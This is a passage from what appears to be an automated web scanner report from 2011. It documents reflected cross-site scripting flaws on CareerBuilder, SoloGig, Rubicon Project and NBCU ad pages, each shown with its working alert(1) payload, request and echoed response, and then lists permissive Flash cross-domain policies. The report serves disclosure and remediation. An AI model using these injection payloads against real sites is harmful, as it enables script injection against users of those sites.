Referer: http://www.google.com/search?hl=en&q=a46ea\'%3balert(1)//ccd1a479379

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35980
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR5
Date: Sun, 04 Sep 2011 01:25:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
rver='www';
s_cb.channel='JS_Resources';
s_cb.prop1='Toolkit';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - a46ea\\';alert(1)//ccd1a479379';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.115. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /jobseeker/companies/companysearch.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac754\'%3balert(1)//bf43d41b9e1 was submitted in the Referer HTTP header. This input was echoed as ac754\\';alert(1)//bf43d41b9e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jobseeker/companies/companysearch.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ac754\'%3balert(1)//bf43d41b9e1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242490
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 04 Sep 2011 01:26:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
';
s_cb.channel='JS_FindJobs';
s_cb.prop1='Search By Company';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - ac754\\';alert(1)//bf43d41b9e1';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.116. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /jobseeker/jobs/jobfindadv.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29a9c\'%3balert(1)//26924e3eff9 was submitted in the Referer HTTP header. This input was echoed as 29a9c\\';alert(1)//26924e3eff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jobseeker/jobs/jobfindadv.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=29a9c\'%3balert(1)//26924e3eff9

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50891
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 04 Sep 2011 01:25:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...

s_cb.channel='JS_FindJobs';
s_cb.prop1='Advanced Search - AL';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 29a9c\\';alert(1)//26924e3eff9';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.117. http://www.sologig.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sologig.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daacc\'%3balert(1)//bee404bb814 was submitted in the Referer HTTP header. This input was echoed as daacc\\';alert(1)//bee404bb814 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET / HTTP/1.1
Host: www.sologig.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=daacc\'%3balert(1)//bee404bb814

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 27472
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 04 Sep 2011 01:27:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
me - ';
s_cb.server='www.sologig.com';
s_cb.channel='js_home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - daacc\\';alert(1)//bee404bb814';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.118. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 339a4"><script>alert(1)</script>b294b1824ff was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=339a4"><script>alert(1)</script>b294b1824ff; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:24 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:45:24 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:45:24 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^28&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=112475; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3152805.js^1^1315097124^1315097124&224353.js^1^1315097124^1315097124&3220233.js^1^1315097119^1315097119&3222405.js^2^1315097118^1315097119&3164882.js^1^1315097118^1315097118&3214995.js^4^1315096957^1315097118; expires=Sun, 11-Sep-2011 00:45:24 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1325

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=339a4"><script>alert(1)</script>b294b1824ff" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

5.119. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6291/9346/15214-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a1a"-alert(1)-"9813aded66a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6291/9346/15214-15.js?cb=0.6276808138936758&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=18a1a"-alert(1)-"9813aded66a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:05:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 02:05:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^1630e6e4816a1fe505c6d800e&9346^58; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111289; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2014

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3150791"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=18a1a"-alert(1)-"9813aded66a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.120. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6291/9346/15214-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e793a"-alert(1)-"d2b2e260b31 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6291/9346/15214-2.js?cb=0.41656556632369757&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=e793a"-alert(1)-"d2b2e260b31; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; ses2=5032^1; csi2=3214995.js^1^1315096957^1315096957

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:01:33 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6291/9346; expires=Sun, 04-Sep-2011 02:01:33 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 02:01:33 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^1630e6e488d0ee79e0d5a80a7&9346^49; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111506; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2014

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3150789"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=e793a"-alert(1)-"d2b2e260b31\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.121. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [xa cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcudigitaladops.com
Path:   /hosted/util/getRemoteDomainCookies.js

Issue detail

The value of the xa cookie is copied into the HTML document as plain text between tags. The payload 6a7e7<script>alert(1)</script>407e0c8623c was submitted in the xa cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hosted/util/getRemoteDomainCookies.js?callback=__nbcadops_xasis.getRemoteDomainCookiesCallback HTTP/1.1
Host: www.nbcudigitaladops.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xa=n6a7e7<script>alert(1)</script>407e0c8623c

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 152
Content-Type: application/javascript
ETag: "15f491-44-4aacd3f4ef780"
Expires: Sun, 04 Sep 2011 00:52:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:52:44 GMT
Connection: close

__nbcadops_xasis.getRemoteDomainCookiesCallback("xa=n6a7e7<script>alert(1)</script>407e0c8623c; pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000");

6. Flash cross-domain policy
There are 127 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.2. http://ad.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:07 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.3. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 04 Sep 2011 01:21:13 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.4. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 01:05:49 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 01:05:49 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.5. http://admeld.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:01:37 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:01:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.6. http://admin.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Sun, 04 Sep 2011 01:06:33 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.7. http://ads.undertone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 29 Aug 2011 20:44:50 GMT
ETag: "52206e9-fc-4abaaf7619480"
Content-Type: text/xml
Date: Sun, 04 Sep 2011 00:45:04 GMT
Content-Length: 252
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.8. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:45:21 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.9. http://api.affinesystems.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.affinesystems.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.affinesystems.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:21:56 GMT
Server: Apache/2.2.16 (Debian)
